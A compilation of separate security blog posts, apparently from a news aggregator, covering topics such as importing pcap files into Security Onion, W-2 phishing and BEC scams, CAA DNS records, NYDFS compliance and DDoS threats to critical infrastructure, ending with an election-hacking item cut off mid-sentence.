The speed and scope of software development today is creating new challenges in ensuring the security of software. But they also create the opportunity to finally get application security right. Both the challenge and the opportunity stem, in part, from the fact that security is “shifting left.” The responsibility for ensuring the stability and security of software through production and customer usage is moving earlier in the cycle to include developers. This shift means security can get baked into code earlier, greatly increasing the chance of producing secure code without costly late-stage fixes.

But it also means a higher level of developer involvement in security, and often some work by the security team to get developers on board with the initiative. To ensure the success of your application security initiative, it’s essential to work closely with your developers so they understand the guidelines, strategies, policies, procedures and security risks involved with application security. What’s more, they must be prepared and equipped to operate securely within their particular development processes. Ryan O’Boyle, product security architect at CA Veracode, recently recorded a quick “chalkboard” video where he outlines our top 5 ways to get developer application security buy-in. Listen to Ryan as he walks you through:

Way No. 1: Timing: Bring in developers early in the planning process.

Way No. 2: Understanding: Learn about developers’ priorities and processes.

Way No. 3: Training: Most developers have no training on secure coding practices.

Way No. 4: Integrating: Work to integrate application security into existing developer tools and processes.

Way No. 5: Automating: Build tests into the pipeline through automation.

Watch Ryan’s short video get all the details on these five tactics, and set yourself up for AppSec success.

Importing Pcap into Security Onion

Within the last week, Doug Burks of Security Onion (SO) added a new script that revolutionizes the use case for his amazing open source network security monitoring platform.

I have always used SO in a live production mode, meaning I deploy a SO sensor sniffing a live network interface. As the multitude of SO components observe network traffic, they generate, store, and display various forms of NSM data for use by analysts.

The problem with this model is that it could not be used for processing stored network traffic. If one simply replayed the traffic from a .pcap file, the new traffic would be assigned contemporary timestamps by the various tools observing the traffic.

While all of the NSM tools in SO have the independent capability to read stored .pcap files, there was no unified way to integrate their output into the SO platform.

Therefore, for years, there has not been a way to import .pcap files into SO -- until last week!

Here is how I tested the new so-import-pcap script. First, I made sure I was running Security Onion Elastic Stack Release Candidate 2 (14.04.5.8 ISO) or later. Next I downloaded the script using wget from https://github.com/Security-Onion-Solutions/securityonion-elastic/blob/master/usr/sbin/so-import-pcap.

I continued as follows:

richard@so1:~$ sudo cp so-import-pcap /usr/sbin/

richard@so1:~$ sudo chmod 755 /usr/sbin/so-import-pcap

I tried running the script against two of the sample files packaged with SO, but ran into issues with both.

richard@so1:~$ sudo so-import-pcap /opt/samples/10k.pcap

so-import-pcap

Please wait while...
...creating temp pcap for processing.
mergecap: Error reading /opt/samples/10k.pcap: The file appears to be damaged or corrupt
(pcap: File has 263718464-byte packet, bigger than maximum of 262144)
Error while merging!

I checked the file with capinfos.

richard@so1:~$ capinfos /opt/samples/10k.pcap
capinfos: An error occurred after reading 17046 packets from "/opt/samples/10k.pcap": The file appears to be damaged or corrupt.
(pcap: File has 263718464-byte packet, bigger than maximum of 262144)

Capinfos confirmed the problem. Let's try another!

richard@so1:~$ sudo so-import-pcap /opt/samples/zeus-sample-1.pcap

so-import-pcap

Please wait while...
...creating temp pcap for processing.
mergecap: Error reading /opt/samples/zeus-sample-1.pcap: The file appears to be damaged or corrupt
(pcap: File has 1984391168-byte packet, bigger than maximum of 262144)
Error while merging!

Another bad file. Trying a third!

richard@so1:~$ sudo so-import-pcap /opt/samples/evidence03.pcap

so-import-pcap

Please wait while...
...creating temp pcap for processing.
...setting sguild debug to 2 and restarting sguild.
...configuring syslog-ng to pick up sguild logs.
...disabling syslog output in barnyard.
...configuring logstash to parse sguild logs (this may take a few minutes, but should only need to be done once)...done.
...stopping curator.
...disabling curator.
...stopping ossec_agent.
...disabling ossec_agent.
...stopping Bro sniffing process.
...disabling Bro sniffing process.
...stopping IDS sniffing process.
...disabling IDS sniffing process.
...stopping netsniff-ng.
...disabling netsniff-ng.
...adjusting CapMe to allow pcaps up to 50 years old.
...analyzing traffic with Snort.
...analyzing traffic with Bro.
...writing /nsm/sensor_data/so1-eth1/dailylogs/2009-12-28/snort.log.1261958400

Import complete!

You can use this hyperlink to view data in the time range of your import:
https://localhost/app/kibana#/dashboard/94b52620-342a-11e7-9d52-4f090484f59e?_g=(refreshInterval:(display:Off,pause:!f,value:0),time:(from:'2009-12-28T00:00:00.000Z',mode:absolute,to:'2009-12-29T00:00:00.000Z'))

or you can manually set your Time Range to be:
From: 2009-12-28    To: 2009-12-29


Incidentally here is the capinfos output for this trace.

richard@so1:~$ capinfos /opt/samples/evidence03.pcap
File name:           /opt/samples/evidence03.pcap
File type:           Wireshark/tcpdump/... - pcap
File encapsulation:  Ethernet
Packet size limit:   file hdr: 65535 bytes
Number of packets:   1778
File size:           1537 kB
Data size:           1508 kB
Capture duration:    171 seconds
Start time:          Mon Dec 28 04:08:01 2009
End time:            Mon Dec 28 04:10:52 2009
Data byte rate:      8814 bytes/s
Data bit rate:       70 kbps
Average packet size: 848.57 bytes
Average packet rate: 10 packets/sec
SHA1:                34e5369c8151cf11a48732fed82f690c79d2b253
RIPEMD160:           afb2a911b4b3e38bc2967a9129f0a11639ebe97f
MD5:                 f8a01fbe84ef960d7cbd793e0c52a6c9
Strict time order:   True

That worked! Now to see what I can find in the SO interface.

I accessed the Kibana application and changed the timeframe to include those in the trace.


Here's another screenshot. Again I had to adjust for the proper time range.


Very cool! However, I did not find any IDS alerts. This made me wonder if there was a problem with alert processing. I decided to run the script on a new .pcap:

richard@so1:~$ sudo so-import-pcap /opt/samples/emerging-all.pcap

so-import-pcap

Please wait while...
...creating temp pcap for processing.
...analyzing traffic with Snort.
...analyzing traffic with Bro.
...writing /nsm/sensor_data/so1-eth1/dailylogs/2010-01-27/snort.log.1264550400

Import complete!

You can use this hyperlink to view data in the time range of your import:
https://localhost/app/kibana#/dashboard/94b52620-342a-11e7-9d52-4f090484f59e?_g=(refreshInterval:(display:Off,pause:!f,value:0),time:(from:'2010-01-27T00:00:00.000Z',mode:absolute,to:'2010-01-28T00:00:00.000Z'))

or you can manually set your Time Range to be:
From: 2010-01-27    To: 2010-01-28

When I searched the interface for NIDS alerts (after adjusting the time range), I found results:


The alerts show up in Sguil, too!



This is a wonderful development for the Security Onion community. Being able to import .pcap files and analyze them with the standard SO tools and processes, while preserving timestamps, makes SO a viable network forensics platform.

This thread in the mailing list is covering the new script.

I suggest running on an evaluation system, probably in a virtual machine. I did all my testing on Virtual Box. Check it out! 

Weekly Cyber Risk Roundup: W-2 Theft, BEC Scams, and SEC Guidance

The FBI is once again warning organizations that there has been an increase in phishing campaigns targeting employee W-2 information. In addition, this week saw new breach notifications related to W-2 theft, as well as reports of a threat actor targeting Fortune 500 companies with business email compromise (BEC) scams in order to steal millions of dollars.

The recent breach notification from Los Angeles Philharmonic highlights how W-2 information is often targeted during the tax season: attackers impersonated the organization’s chief financial officer via what appeared to be a legitimate email address and requested that the W-2 information for every employee be forwarded.

“The most popular method remains impersonating an executive, either through a compromised or spoofed email in order to obtain W-2 information from a Human Resource (HR) professional within the same organization,” the FBI noted in its alert on W-2 phishing scams.

In addition, researchers said that a threat actor, which is likely of Nigerian origin, has been successfully targeting accounts payable personnel at some Fortune 500 companies to initiate fraudulent wire transfers and steal millions of dollars. The examples observed by the researchers highlight “how attackers used stolen email credentials and sophisticated social engineering tactics without compromising the corporate network to defraud a company.”

The recent discoveries highlight the importance of protecting against BEC and other types of phishing scams. The FBI advises that the key to reducing the risk is understanding the criminals’ techniques and deploying effective mitigation processes, such as:

  • limiting the number of employees who have authority to approve wire transfers or share employee and customer data;
  • requiring another layer of approval such as a phone call, PIN, one-time code, or dual approval to verify identities before sensitive requests such as changing the payment information of vendors is confirmed;
  • and delaying transactions until additional verification processes can be performed.

2018-02-24_ITTGroups.png

Other trending cybercrime events from the week include:

  • Spyware companies hacked: A hacker has breached two different spyware companies, Mobistealth and Spy Master Pro, and provided gigabytes of stolen data to Motherboard. Motherboard reported that the data contained customer records, apparent business information, and alleged intercepted messages of some people targeted by the malware.
  • Data accidentally exposed: The University of Wisconsin – Superior Alumni Association is notifying alumni that their Social Security numbers may have been exposed due to the ID numbers for some individuals being the same as their Social Security numbers and those ID numbers being shared with a travel vendor. More than 70 residents of the city of Ballarat had their personal information posted online when an attachment containing a list of individuals who had made submissions to the review of City of Ballarat’s CBD Car Parking Action Plan was posted online unredacted. Chase said that a “glitch” led to some customers’ personal information being displayed on other customers’ accounts.
  • Notable data breaches: The compromise of a senior moderator’s account at the HardwareZone Forum led to a breach affecting 685,000 user profiles, the site’s owner said. White and Bright Family Dental is notifying patients that it discovered unauthorized access to a server that contained patient personal information. The University of Virginia Health System is notifying 1,882 patients that their medical records may have been accessed due to discovering malware on a physician’s device. HomeTown Bank in Texas is notifying customers that it discovered a skimming device installed on an ATM at its Galveston branch.
  • Other notable events: The Colorado Department of Transportation said that its Windows computers were infected with SamSam ransomware and that more than 2,000 computers were shut down to stop the ransomware from spreading and investigate the attack. The city of Allentown, Pennsylvania, said it is investigating the discovery of malware on its systems, but there is no reason to believe personal data has been compromised. Harper’s Magazine is warning its subscribers that their credentials may have been compromised.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.

2018-02-24_ITT

Cyber Risk Trends From the Past Week

2018-02-24_RiskScores

The U.S. Securities and Exchange Commission (SEC) issued updated guidance on how public organizations should respond to data breaches and other cybersecurity issues last week.

The document, titled “Commission Statement and Guidance on Public Company Cybersecurity Disclosures,” states that “it is critical that public companies take all required actions to inform investors about material cybersecurity risks and incidents in a timely fashion, including those companies that are subject to material cybersecurity risks but may not yet have been the target of a cyber-attack.”

The SEC also advised that directors, officers, and other corporate insiders should not trade a public company’s securities if they are in possession of material nonpublic information — an issue that arose when it was reported that several Equifax executives sold shares in the days following the company’s massive data breach. The SEC said that public companies should have policies and procedures in place to prevent insiders from taking advantage of insider knowledge of cybersecurity incidents, as well as to ensure a timely disclosure of any related material nonpublic information.

“I believe that providing the Commission’s views on these matters will promote clearer and more robust disclosure by companies about cybersecurity risks and incidents, resulting in more complete information being available to investors,” said SEC Chairman Jay Clayton.  “In particular, I urge public companies to examine their controls and procedures, with not only their securities law disclosure obligations in mind, but also reputational considerations around sales of securities by executives.”

The SEC unanimously approved the updated guidance; however, Reuters reported that there was reluctant support from democrats on the commission who were calling for much more rigorous rulemaking to be put in place.

Ground Control to Major Thom

I recently finished a book called “Into the Black” by Roland White, charting the birth of the space shuttle from the beginnings of the space race through to it’s untimely retirement. It is a fascinating account of why “space is hard” and exemplifies the need for compromise and balance of risks in even the harshest … Read More

Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years, and has been a joint collaboration between ten industry partners and academic entities. Here’s the official description of the project.

The Scalable and Secure Infrastructures for Cloud Operations (SSICLOPS, pronounced “cyclops”) project focuses on techniques for the management of federated cloud infrastructures, in particular cloud networking techniques within software-defined data centres and across wide-area networks. SSICLOPS is funded by the European Commission under the Horizon2020 programme (https://ssiclops.eu/). The project brings together industrial and academic partners from Finland, Germany, Italy, the Netherlands, Poland, Romania, Switzerland, and the UK.

The primary goal of the SSICLOPS project is to empower enterprises to create and operate high-performance private cloud infrastructure that allows flexible scaling through federation with other clouds without compromising on their service level and security requirements. SSICLOPS federation supports the efficient integration of clouds, no matter if they are geographically collocated or spread out, belong to the same or different administrative entities or jurisdictions: in all cases, SSICLOPS delivers maximum performance for inter-cloud communication, enforce legal and security constraints, and minimize the overall resource consumption. In such a federation, individual enterprises will be able to dynamically scale in/out their cloud services: because they dynamically offer own spare resources (when available) and take in resources from others when needed. This allows maximizing own infrastructure utilization while minimizing excess capacity needs for each federation member.

Many of our systems (both backend and on endpoints) rely on the ability to quickly query the reputation and metadata of objects from a centrally maintained repository. Reputation queries of this type are served either directly from the central repository, or through one of many geographically distributed proxy nodes. When a query is made to a proxy node, if the required verdicts don’t exist in that proxy’s cache, the proxy queries the central repository, and then delivers the result. Since reputation queries need to be low-latency, the additional hop from proxy to central repository slows down response times.

In the scope of the SSICLOPS project, we evaluated a number of potential improvements to this content distribution network. Our aim was to reduce the number of queries from proxy nodes to the central repository, by improving caching mechanisms for use cases where the set of the most frequently accessed items is highly dynamic. We also looked into improving the speed of communications between nodes via protocol adjustments. Most of this work was done in cooperation with Deutsche Telecom and Aalto University.

The original implementation of our proxy nodes used a Least Recently Used (LRU) caching mechanism to determine which cached items should be discarded. Since our reputation verdicts have time-to-live values associated with them, these values were also taken into account in our original algorithm.

Hit Rate Results

Initial tests performed in October 2017 indicated that SG-LRU outperformed LRU on our dataset

During the project, we worked with Gerhard Hasslinger’s team at Deutsch Telecom to evaluate whether alternate caching strategies might improve the performance of our reputation lookup service. We found that Score-Gated LRU / Least Frequently Used (LFU) strategies outperformed our original LRU implementation. Based on the conclusions of this research, we have decided to implement a windowed LFU caching strategy, with some limited “predictive” features for determining which items might be queried in the future. The results look promising, and we’re planning on bringing the new mechanism into our production proxy nodes in the near future.

fraction_of_top_k_results_compared_to_cache_hit_rates

SG-LRU exploits the focus on top-k requests by keeping most top-k objects in the cache

The work done in SSICLOPS will serve as a foundation for the future optimization of content distribution strategies in many of F-Secure’s services, and we’d like to thank everyone who worked with us on this successful project!

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

It's been a long time since I audited someone's DNS file but recently while checking a client's DNS configuration I was surprised that the CAA records were set randomly "so to speak". I discussed with the administrator and was surprised to see that he has no clue of CAA, how it works and why is it so important to enable it correctly. That made me wonder, how many of us actually know that; and how can it be a savior if someone attempts to get SSL certificate for your domain.

What is CAA?

CAA or Certificate Authority Authorization is a record that identifies which CA (certificate authorities) are allowed to issue certificate for the domain in question. It is declared via CAA type in the DNS records which is publicly viewable, and can be verified before issuing certificate by a certificate authority.

Brief Background

While the first draft was documented by Phillip Hallem-Baker and Rob Stradling back in 2010, it accelerated the work in last 5 years due to issues with CA and hacks around. The first CA subversion was in 2001 when VeriSign issued 2 certificates to an individual claiming to represent Microsoft; these were named "Microsoft Corporation". These certificate(s) could have been used to spoof identity, and providing malicious updates etc. Further in 2011 fraudelent certificates were issued by Comodo[1] and DigiNotar[2] after being attacked by Iranian hackers (more on Comodo attack, and dutch DigiNotar attack); an evidence of their use in a MITM attack in Iran.

Further in 2012 Trustwave issued[3] a sub-root certificate that was used to sniff SSL traffic in the name of transparent traffic management. So, it's time CA are restricted or whitelisted at domain level.

What if no CAA record is configured in DNS?

Simply put the CAA record shall be configured to announce which CA (certificate authorities) are permitted to issue a certificate for your domain. Wherein, if no CAA record is provided, any CA can issue a certificate for your domain.

CAA is a good practice to restrict your CA presence, and their power(s) to legally issue certificate for your domain. It's like whitelisting them in your domain!

The process mandates a Certificate Authority[4] (yes, it mandates now!) to query DNS for your CAA record, and the certificate can only be issued for your hostname, if either no record is available, or this CA has been "whitelisted". The CAA record enables the rules for the parent domain, and the same are inherited by sub-domains. (unless otherwise stated in DNS records).

Certificates authorities interpret the lack of a CAA record to authorize unrestricted issuance, and the presence of a single blank issue tag to disallow all issuance.[5]

CAA record syntax/ format

The CAA record has the following format: <flag> <tag> <value> and has the following meaning,

Tag Name Usage
flag This is an integer flag with values 1-255 as defined in the RFC 6844[6]. It is currently used to call the critical flag.[7]
tag This is an ASCII string (issue, issuewild, iodef) which identifies the property represented by the record policy.
value The value of the property defined in the <tag>

The tags defined in the RFC have the following meaning and understanding with the CA records,

  • issue: Explicitly authorizes a "single certificate authority" to issue any type of certificate for the domain in scope.
  • issuewild: Explicitly authorizes a "single certificate authority" to issue only a wildcard certificate for the domain in scope.
  • iodef: certificate authorities will report the violations accordingly if the certificate is issued, or requested that breach the CAA policy defined in the DNS records. (options: mailto:, http:// or https://)
DNS Software Support

As per excerpt from Wikipedia[8]: CAA records are supported by BIND (since version 9.10.1B),Knot DNS (since version 2.2.0), ldns (since version 1.6.17), NSD (as of version 4.0.1), OpenDNSSEC, PowerDNS (since version 4.0.0), Simple DNS Plus (since version 6.0), tinydns and Windows Server 2016.
Many hosted DNS providers also support CAA records, including Amazon Route 53, Cloudflare, DNS Made Easy and Google Cloud DNS.

Example: (my own website DNS)

As per the policy, I have configured that ONLY "letsencrypt.org" but due to Cloudflare Universal SSL support, the following certificate authorities get configured as well,

  • 0 issue "comodoca.com"
  • 0 issue "digicert.com"
  • 0 issue "globalsign.com"
  • 0 issuewild "comodoca.com"
  • 0 issuewild "digicert.com"
  • 0 issuewild "globalsign.com"

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

Also, configured iodef for violation: 0 iodef "mailto:hello@cybersins.com"

How's the WWW doing with CAA?

After the auditing exercise I was curious to know how are top 10,000 alexa websites doing with CAA and strangely enough I was surprised with the results: only 4% of top 10K websites have CAA DNS record.

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

[Update 27-Feb-18]: This pie chart was updated with correct numbers. Thanks to Ich Bin Niche Sie for identifying the calculation error.

Now, we have still a long way to go with new security flags and policies like "CAA DNS Record", "security.txt" file etc. and I shall be covering these topics continuously to evangelize security in all possible means without disrupting business. Remember to always work hand in hand with the business.

Stay safe, and tuned in.


  1. Comodo CA attack by Iranian hackers: https://arstechnica.com/information-technology/2011/03/independent-iranian-hacker-claims-responsibility-for-comodo-hack/ ↩︎

  2. Dutch DigiNotar attack by Iranian hackers: https://arstechnica.com/information-technology/2011/08/earlier-this-year-an-iranian/ ↩︎

  3. Trustwave Subroot Certificate: http://www.h-online.com/security/news/item/Trustwave-issued-a-man-in-the-middle-certificate-1429982.html ↩︎

  4. CAA Checking Mandatory (Ballot 187 results) 2017: https://cabforum.org/pipermail/public/2017-March/009988.html ↩︎

  5. Wikipedia Article: https://en.wikipedia.org/wiki/DNS_Certification_Authority_Authorization ↩︎

  6. IETF RFC 6844 on CAA record: https://tools.ietf.org/html/rfc6844 ↩︎

  7. The confusion of critical flag: https://tools.ietf.org/html/rfc6844#section-7.3 ↩︎

  8. Wikipedia Support Section: https://en.wikipedia.org/wiki/DNS_Certification_Authority_Authorization#Support ↩︎

Former Trump adviser Sebastian Gorka insults, threatens, and attacks journalists

gorka1
Screengrab from a video shot by Daily Beast reporter Max Tani

“You are the epitome of fake news,” former Trump White House adviser Sebastian Gorka told a journalist yesterday. “You are wasting your time here, cause we’re patriots here.” In an audio recording obtained by Freedom of the Press Foundation, he continued, “We don’t want to destroy the country, or hang out with people like yourself who don’t like this country.”

Gorka seemed to spend the first two days of the Conservative Political Action Conference insulting, taunting, threatening, and—in at least one case—physically attacking journalists.

ThinkProgress reporter Kira Lerner had approached the former Trump White House adviser to ask him about a video posted on Twitter that had quickly gone viral earlier that morning. In it, Gorka can be seen shoving Mediaite reporter Caleb Ecarma, raising his hand as if to strike him, and then telling him to “fuck off.”

Lerner’s colleague at ThinkProgress, Addy Baird, had also requested comment Gorka earlier in the day about the altercation with Ecarma. When she told Gorka that she was with ThinkProgress, he told her, “ThinkProgress isn’t reporters. I’m not interested.” He started walking away, but then turned around and whistled at her. “I have a comment for you,” Baird says Gorka told her. “You’re as much of a reporter as he is,” referring to Caleb Ecarma.

Gorka refused to answer Lerner’s and Baird’s questions because of the media outlet they represent. In fact, according to numerous reporters present at CPAC yesterday near Washington, D.C., Gorka denied interviews to any progressive news organization that approached him.

He did, however, speak with the Daily Signal, the news organization of right-wing The Heritage Foundation. The Daily Beast reported that although Gorka denied interviews with the Beast and Comedy Central’s The Opposition, he told a representative of WorldNetDaily to text him.

HuffPost politics reporter Igor Bobic tweeted that he “nearly got into a fight with Sebastian Gorka at a bar at CPAC” after asking him why he blocks people on Twitter. (However, Gorka’s allies present at CPAC have contested Bobic’s claim in replies on Twitter.)

On the second day of CPAC on Friday, Kira Lerner approached Gorka to again ask him about the altercation with Ecarma. “I’m asking you for comment on the video of you assaulting a reporter,” she can be heard saying in audio obtained by Freedom of the Press Foundation. After initially refusing to speak to her, calling her an illegitimate journalist because she works for ThinkProgress, he then claimed that Ecarma “wanted a fight.”

“He’s a lunatic,” Gorka responds. “He said he wanted to have a pistol duel with me in D.C. He’s unhinged, and I have the emails, and I’m going to put out a restraining order on him, because he stalked me in Florida. He’s not mentally fit.”

Caleb Ecarma told Freedom of the Press Foundation that when he bumped into Gorka at the Turning Point USA Student Action Summit in Florida last December, Gorka lunged at him and had to be pulled off by security. The tension between the two began months earlier in October, when Ecarma got into a heated email exchange with Gorka after accusing him on Twitter of illegally parking his car.

Sebastian Gorka’s advisory role to President Trump was deeply controversial—he allegedly has ties to white supremacist and Hungarian fascist groups. While still working for the White House, he accused BBC radio journalists of being part of a “fake news industrial complex.”  

After he left the White House last August, he announced that he would be returning to Breitbart News and later accepted a position as a national security analyst for Fox News. But despite working for two media organizations, Gorka continues to aggressively berate and attempt to intimidate journalists.

It is troubling enough when a public figure like Gorka attacks or insults reporters with any media outlet that he deems “irrelevant” or “fake news”, or those that he claims hate America. But Gorka also has the ear of the President, who has spent his first year in office incessantly attacking the press and threatening news organizations and journalists with lawsuits over coverage he doesn’t like. Gorka’s treatment of the press at CPAC is emblematic of a worrying and callous disregard for the First Amendment embodied by many public figures close to the Trump Administration.

Sebastian Gorka did not immediately respond to a request by Freedom of the Press Foundation for comment.

Pindrop® Passport | Authentication 101

It is obvious that fraudsters’ sophistication is evolving, surpassing security measures toward a single end goal — financial gain. Worse, consumers are unaware of the effects of social media, with 61% admitting to sharing answers to security questions over their online profiles. This percentage rises to 80% for 18-24 year olds, making them beyond easy targets to fraudsters. Additionally, personal identifying information (PII) can be bought over the black market, further enabling fraudsters to bypass security measures.

This easy access of information has rendered traditional call center identity solutions — including knowledge-based authentication (KBA) questions, ANI verification, caller ID, and standalone voice biometric solutions ineffective and inefficient. Legacy call center security solutions are slow to provide information, increasing average call handle times, and ultimately impacting the overall customer experience. In response to these insufficiencies, new technologies are leading authentication to new bounds, characterized by behavior and voice.

As we move towards an economy dictated by conversational commerce, voice biometric solutions are directly impacting authentication. The popularity of transactions made through voice-led devices, such as Amazon Alexas and Google Homes, has created further interest in integrating voice into enterprises. The voice-led revolution has allowed voice biometric solutions to step in as an alternative method of authentication. However, the strong dependency on a single type of technology has left enterprises open to fraudulent activity.

Due to the relentless nature of fraudsters and their continued attempts to work around security measures, enterprises must reexamine and protect all vulnerabilities. Standalone voice biometric solutions are not enough to authenticate callers, and until now, voice biometric engines have not accounted for voice aging. Enterprises should enact a layered approach, using voice biometrics as part of a multi-factor solution.

Pindrop® Passport combines our proprietary Deep Voice™ biometric engine with Phoneprinting™ and Toneprinting™ technologies to provide passive intelligence to authenticate legitimate callers in real-time. Learn more.

The post Pindrop® Passport | Authentication 101 appeared first on Pindrop.

NYDFS Cybersecurity Regulation Transition Period Ends

NYDFS Cybersecurity Regulation Compliance

March 1, 2018 marks the end of the one-year transition period for the New York Department of Financial Services (NYDFS) cybersecurity regulation. The passage of this date means affected organizations — including banks, insurance companies, and other financial services companies licensed by or operating in New York State — must be in compliance with a raft of security rules intended to protect non-public information from cyberattacks and data loss.

The landmark NYDFS rules (officially known as 23 NYCRR Part 500) go into effect on a rolling basis, to give covered entities time to upgrade their security policies and procedures to meet compliance. The initial set of compliance requirements focus on risk assessment and reporting, penetration testing, employee training and monitoring, and access management.

According to the NYDFS, covered entities must be in compliance with sections 500.04(b), 500.05, 500.09, 500.12, and 500.14(b), by March 1, 2018. Additional requirements will go into effect in September 2018, including requirements for securing internally developed and third-party applications.

Below we offer a summary of the NYDFS rules covered entities must comply with as of March 1, 2018.

Section 500.04: Chief Information Security Officer

The chief information security officer (CISO) for covered entities must give an annual report to the organization's board of directors, or a senior officer if no such governing body exists. The written report should cover the overall effectiveness of the cybersecurity program, material cybersecurity risks, and material cybersecurity events within the period covered by the report.

Section 500.05: Penetration Testing and Vulnerability Assessments

Covered entities must conduct monitoring and testing to assess the effiectiveness of their security. Security programs should include continuous monitoring for security events, as well as penetration tests and vulnerability assessments. Penetration testing should be conducted at least annually, based on the entity's risk assessment. Vulnerability assessments, conducted at least bi-annually, should include systematic scans or reviews to find publicly known vulnerabilities in the entity's information systems.

500.09: Risk Assessment

Covered entities must conduct period risk assessments to inform the design of the cybersecurity program. These risk assessments must consider the impacts of evolving technologies and emerging threats. Risk assessments must be conducted in accordance with written policies and procedures, which must address how risks will be mitigated or accepted, and how the entity will address the risks.

Section 500.12: Multi-Factor Authentication

Security controls, such as multi-factor authentication, must be in place to prevent unauthorized users from accessing non-public information and systems.

Section 500.14: Training and Monitoring

Covered entities must put in place policies and procedures for monitoring the activity of authorized users, and for detecting unauthorized access to non-public information and information systems. They must also provide periodic cybersecurity awareness training for employees.

Coming in September 2018: Application Security Requirements

Among the requirements for compliance going into effect in September 2018, covered entities must have policies and procedures in place for securing the software applications they develop or purchase. The regulation requires organizations to implement standards to ensure the use of secure coding best practices for internally developed applications, and procedures for assessing or testing third-party software used in the organization's IT environment.

How CA Veracode Can Help

You should check with your compliance and legal departments for complete information on how you may be required to comply. The following CA Veracode products and services may help you secure your internally developed and third-party software, as part of a complete cybersecurity program.

  • CA Veracode's Application Security Platform can provide a secure audit trail of your compliance processes, including critical information such as application security scores; lists of all discovered flaws; and flaw status information (new, open, fixed, or re-opened). Summary data is also included for third-party assessments, including scores and top risk categories.
  • CA Veracode Static Analysis can ensure that your applications are not vulnerable to attack through exploits such as SQL injection and cross-site scripting, preventing potential data loss, brand damage, and ransomware infections.
  • CA Veracode Static Analysis can help meet the requirement (going into effect in March 2019) to encrypt non-public information, by assessing your applications’ cryptographic code for known vulnerabilities and ensuring encryption is implemented correctly.
  • CA Veracode Software Composition Analysis analyzes your applications to create an inventory of third-party commercial and open source components, alerting your developers to the presence of components with known vulnerabilities. When a new component vulnerability is exposed, you can quickly identify if any of your applications are at risk.
  • CA Veracode Manual Penetration Testing complements CA Veracode's automated scanning technologies with best-in-class penetration testing services.

More Information

To learn more about securing all the applications you develop or assemble from third-party code, and the applications you buy, download our guide for getting started with an application security program.

Read our FAQ for more information about who is affected by the regulation, and read our new guide explaining how you might meet the compliance requirements: Navigating the New York Department of Financial Services Cybersecurity Regulations.

[nid-embed:26566]

US and European Agencies Warn about the Risk of International Cyber Threats

International cyber relations don’t feel very warm, safe and fuzzy these days. This past week Robert Mueller, the U.S. special counsel to the Justice Department’s investigation into Russia’s possible meddling in the 2016 American elections, indicted 13 Russian nationals of creating information warfare propaganda campaigns. In the same week, Dan Coats, the United States Director of National Intelligence, issued his agency’s annual Worldwide Threat Assessment of the Intelligence Community. In that report the agency stated,

“The potential for surprise in the cyber realm will increase in the next year and beyond as billions more digital devices are connected—with relatively little built-in security—and both nation states and malign actors become more emboldened and better equipped in the use of increasingly widespread cyber toolkits. The risk is growing that some adversaries will conduct cyber attacks—such as data deletion or localized and temporary disruptions of critical infrastructure—against the United States in a crisis short of war.”

The report names Russia, North Korea and Iran as nation states that are most likely to launch cyber attacks on the United States. It also notes, “We expect the line between criminal and nation-state activity to become increasingly blurred as states view cyber criminal tools as a relatively inexpensive and deniable means to enable their operations.” Similarly, the Washington Post recently published an article on this subject of how hostile nations can hide behind “independent” hackers for hire to carry out their cyber war dirty work. It’s become difficult to discern who is a cyber terrorist acting on his/her own accord, and who is a mercenary of a hostile nation-state. Finding and punishing the perpetrators of course is a monumental task.

The concerns outlined by the intelligence report echo the concerns that we’ve written about in previous blog posts. We’ve written on the topic of cyber threats to critical infrastructure, and we’ve often noted how the technology to launch attacks has become cheaper, faster and simpler. In terms of distributed denial of service (DDoS) attacks, even “script kiddies” can launch a fairly serious attack.

Critical infrastructure organizations have to take steps to mitigate the possibility of DDoS and other cyber threats. The European Union Agency for Network and Information Security, the European Union’s cybersecurity agency known as ENISA, is also concerned about potential attacks on critical infrastructure. The agency, founded in 2004, equips the European Union (EU) to prevent, detect and respond to cybersecurity problems. According to Signal, “ENISA emphasizes in the “2017 Threat Landscape” report. “Cyber war is entering dynamically into the cyberspace creating increased concerns to critical infrastructure operators, especially in areas that suffer some sort of cyber crises.”

It’s worth noting that all 28 European Union member nations require that organizations that provide critical infrastructure must comply with a new European Union Network and Information Systems (NIS) Directive that have to be in place by the 9th of May 2018. The UK draft legislation and related guidance has just been published and the UK government is seeking input on the proposal from industry members, infrastructure providers, regulators and other interested parties. The UK will be imposing fines against critical infrastructure organizations (healthcare facilities, electricity, water, energy, digital and transportation utilities) whose lax security standards result in loss of service. For more on this subject, see Corero Vice President Scott Taylor’s blog post on The Energy Industry Times.

Is the US prepared? Some experts think we aren’t. An opinion piece published on February 14, 2018 is titled, “Our critical infrastructure isn't ready for cyber warfare.” It was written by Michael Myers, a lieutenant colonel in the U.S. Air Force and the deputy director and instructor at the Joint Command Control & Info Ops School at the Joint Forces Staff College.

Understandably, IT security teams are often overwhelmed with assessing the constantly evolving cyber threat landscape and prioritizing which security solutions. Overall however, DDoS mitigation must be part of network defense because 1) volumetric DDoS attacks are becoming more common, and can effectively cripple networks and 2) low-threshold, sub-saturating DDoS attacks often mask more surgical security breaches, such as malware and ransomware attacks. (Data breaches and network disruptions often go hand in hand, launched by the same hackers).NIS Guide

When considering which cybersecurity tools to deploy, critical infrastructure organizations should put automated DDoS protection high on the priority list.

Corero is the leader in real-time DDoS defense, if you need expert advice, contact us.

“Know Thyself Better Than The Adversary – ICS Asset Identification and Tracking”

Know Thyself Better Than The Adversary - ICS Asset Identification &amp; Tracking This blog was written by Dean Parsons. As SANS prepares for the 2018 ICS Summit in Orlando, Dean Parsons is preparing a SANS ICS Webcast to precede the event, a Summit talk, and a SANS@Night presentation. In this blog, Dean tackles some common &hellip; Continue reading Know Thyself Better Than The Adversary - ICS Asset Identification and Tracking

States Worry About Election Hacking as Midterms Approach

Mueller indictments of Russian cyber criminals put election hacking at top of mind

State officials expressed grave concerns about election hacking the day after Special Counsel Robert Mueller handed down indictments of 13 Russian nationals on charges of interfering with the 2016 presidential election. The Washington Post reports:

